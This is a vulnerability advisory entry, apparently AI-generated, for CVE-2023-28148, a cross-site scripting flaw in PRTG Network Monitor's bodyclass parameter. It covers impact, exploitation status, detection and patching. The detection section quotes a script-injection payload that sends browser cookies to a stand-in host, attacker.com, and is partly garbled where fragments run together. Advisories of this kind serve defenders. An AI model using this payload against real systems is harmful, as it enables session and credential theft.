
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2023-28148 is a cross-site scripting (XSS) vulnerability in the bodyclass parameter of Paessler PRTG Network Monitor, affecting all versions prior to 23.3.86.1520. The flaw allows unauthenticated, network-based attackers to inject malicious scripts that execute in the browsers of other users viewing the affected page. It carries a CVSS v3.1 base score of 7.2 (High) (GitHub Advisory, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), rooted in insufficient sanitization of the bodyclass parameter before it is rendered in the HTML output of PRTG's web interface. Because no authentication is required and attack complexity is low, an attacker can craft a malicious URL or request that injects arbitrary JavaScript into the page body class attribute. The scope is marked as "Changed," indicating that the injected script can affect resources beyond the vulnerable component itself (i.e., other users' browser sessions) (GitHub Advisory, Feedly). No public proof-of-concept code has been identified at this time.
Successful exploitation allows an unauthenticated attacker to inject and execute malicious JavaScript in the browsers of authenticated PRTG users, enabling theft of session tokens, credentials, or sensitive monitoring data displayed within the PRTG interface. Because PRTG Network Monitor is commonly used for infrastructure monitoring, compromised sessions could expose network topology, device credentials, and alert configurations. Availability is not directly impacted, but confidentiality and integrity are both affected at a low-to-moderate level (GitHub Advisory, Feedly).
There is no evidence of public proof-of-concept exploit code or active in-the-wild exploitation for CVE-2023-28148 at this time. The EPSS score is reported as 0.0, indicating a very low probability of exploitation in the near term. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified (Feedly, GitHub Advisory).
bodyclass parameter (e.g., appending a JavaScript payload such as "><script>document.location='https://attacker.com/steal?c='+document.cookie</script>).bodyclass parameter; repeated access from the same IP to PRTG pages with script-like query strings.The primary remediation is to upgrade Paessler PRTG Network Monitor to version 23.3.86.1520 or later, which resolves the bodyclass XSS issue (GitHub Advisory, Paessler Release History). As interim mitigations, administrators should implement Content Security Policy (CSP) headers on the PRTG web interface to limit the impact of any injected scripts, and restrict access to the PRTG web interface to trusted networks or VPN-only access. Input validation and output encoding for the bodyclass parameter should be enforced at the application layer if a custom deployment allows for such configuration.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."